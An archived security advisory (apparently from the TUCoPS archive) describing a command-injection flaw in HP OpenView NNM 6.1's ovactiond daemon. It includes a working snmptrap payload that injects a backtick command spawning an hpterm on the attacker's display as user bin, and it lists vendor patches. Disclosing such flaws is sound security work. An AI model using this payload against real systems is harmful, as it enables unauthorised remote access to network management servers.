Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: nnm5.htm

OpenView execute any program



    HP Openview NNM6.1


    Milo van der Zee found following.  HP Openview NNM6.1 and  earlier
    running  on  unix  have  a  problem  with  the suid bin executable
    ovactiond.  It allows for starting of any program by just  sending
    a trap or event to the station running the daemon.

    Actually the executable is  NOT suid bin but  it does run as  user
    bin (probably an internal suid system call or started from the pmd
    that  runs  as  bin  or  ...).   So  when  you do a 'ps -ef | grep
    ovactiond'  you  will  see  that  it  is  running as bin.  Even on

    In the trapd.conf the following is defined by default (NNM6.1):

        OV_MgX_NNM_Generic .
        0208 "Configuration Alarms" Warning
        FORMAT Generic NNM to MgX message. $12
        EXEC echo snmpnotify -v 1 -e
        $10 1.3.[snip...]

    By sending this trap:

        snmptrap -v 1 <NNM host> . 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s ""

    You get an hpterm on your client display running under user bin on
    the  NNM  server.   The  reason  is  that  NNM first completes the
    command under the EXEC and then starts that in a shell.


    Apply one of these patches:

        HP-UX 11.00     HP-UX 10.20     SOLARIS 2.X     WinNT4.X/2000
        PHSS_23780      PHSS_23779      PSOV_02905      NNM_00698

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH